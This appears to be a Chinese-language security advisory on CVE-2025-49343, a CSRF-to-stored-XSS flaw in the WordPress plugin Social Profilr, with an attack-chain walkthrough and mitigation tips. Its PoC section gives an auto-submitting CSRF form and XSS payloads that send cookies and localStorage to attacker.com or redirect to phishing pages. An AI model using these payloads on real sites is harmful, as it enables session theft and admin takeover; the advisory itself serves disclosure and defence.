CVE-2025-49343 Social Profilr插件CSRF导致存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-49343

漏洞类型

跨站请求伪造(CSRF)/存储型XSS

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Social Profilr (social-profilr-display-social-network-profile)

漏洞概述

CVE-2025-49343是WordPress插件Social Profilr中的一个高危安全漏洞，CVSS评分7.1。该漏洞允许未经身份验证的攻击者利用跨站请求伪造(CSRF)攻击，在受害者的WordPress站点中注入存储型跨站脚本(XSS)代码。由于攻击者可以在用户个人资料相关的输入字段中嵌入恶意JavaScript代码，这些代码将被永久存储在数据库中。当其他管理员或用户访问包含恶意内容的页面时，注入的脚本会自动执行，可能导致会话劫持、凭据窃取、恶意重定向或管理员权限滥用等严重后果。此漏洞影响Social Profilr插件1.0及以下所有版本，攻击复杂度低，但需要用户交互（点击恶意链接或访问恶意页面）。

技术细节

该漏洞存在于Social Profilr插件处理用户社交网络资料输入的过程中。插件未能正确验证和清理用户提交的数据，且缺少CSRF令牌保护机制。攻击者可以构造恶意HTML表单，诱骗已登录的管理员或用户提交包含JavaScript代码的请求。由于插件直接将用户输入存储到数据库且未进行输出转义，当这些数据在后台或前端页面展示时，恶意脚本会以HTML形式执行。攻击流程包括：1) 攻击者创建包含恶意脚本的表单数据；2) 通过社会工程学手段诱导目标用户访问攻击页面；3) 浏览器自动发送携带目标用户session的请求；4) 恶意数据被存储到WordPress数据库；5) 当其他用户查看个人资料时触发XSS。由于WordPress后台管理界面也使用相同的数据库数据，攻击者可在后台执行任意JavaScript代码，从而获取管理员权限或修改站点配置。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标站点使用的Social Profilr插件版本，确认版本<=1.0且存在CSRF和XSS漏洞

STEP 2

步骤2: 构造攻击载荷

攻击者创建包含恶意JavaScript代码的HTML表单，载荷针对插件的社交资料输入字段（如facebook_url、twitter_url等）

STEP 3

步骤3: 社会工程学攻击

攻击者通过钓鱼邮件、恶意链接或第三方网站诱导目标用户（管理员或具有编辑权限的用户）访问攻击页面

STEP 4

步骤4: 自动发送恶意请求

目标用户浏览器自动发送POST请求到WordPress管理端点，携带用户当前session和恶意载荷

STEP 5

步骤5: 数据持久化

插件接收请求后直接将未过滤的用户输入存储到WordPress数据库，恶意脚本被永久保存

STEP 6

步骤6: XSS触发

当管理员或用户访问显示社交资料的页面时，存储的恶意JavaScript代码被执行

STEP 7

步骤7: 恶意操作执行

攻击者通过注入的脚本窃取session cookie、获取管理员权限、修改站点内容或重定向用户

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-49343 - Stored XSS via Social Profilr -->
<html>
  <body>
    <h2>CSRF Attack - Social Profilr Stored XSS</h2>
    <p>诱骗已登录用户提交恶意资料数据</p>
    
    <form action="http://target-site/wp-admin/admin-post.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="action" value="social_profilr_save">
      <input type="hidden" name="facebook_url" value='"><script>alert(document.cookie)</script><x y="'>
      <input type="hidden" name="twitter_url" value='"><script>fetch("https://attacker.com/steal?c="+btoa(document.cookie))</script><x y="'>
      <input type="hidden" name="linkedin_url" value='"><script>document.location="https://attacker.com/phishing?"+document.cookie</script><x y="'>
      <input type="hidden" name="instagram_url" value='<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie))\'>">'>
      <input type="hidden" name="nonce" value="">
      <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=social-profilr">
      
      <input type="submit" value="Submit Malicious Request">
    </form>
    
    <script>
      // Auto-submit form when page loads
      document.forms[0].submit();
    </script>
  </body>
</html>

<!-- 存储型XSS有效载荷变体 -->
<!-- 1. 会话劫持 -->
<script>
  fetch('https://attacker.com/collect?cookie='+encodeURIComponent(document.cookie));
</script>

<!-- 2. 管理员权限滥用 -->
<script>
  fetch('https://attacker.com/exfiltrate?data='+btoa(JSON.stringify(window.localStorage)));
</script>

<!-- 3. 恶意重定向 -->
<img src=x onerror="window.location.href='https://malicious-site.com/phishing';">

影响范围

Social Profilr <= 1.0 (所有版本)

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1) 临时禁用Social Profilr插件；2) 加强管理员账户安全，使用强密码和双因素认证；3) 限制管理员账户的使用范围，避免从不受信任的网络访问后台；4) 启用Web应用防火墙(WAF)规则检测异常请求；5) 监控WordPress数据库中用户资料表的异常内容；6) 对管理员进行安全意识培训，警惕钓鱼攻击和可疑链接。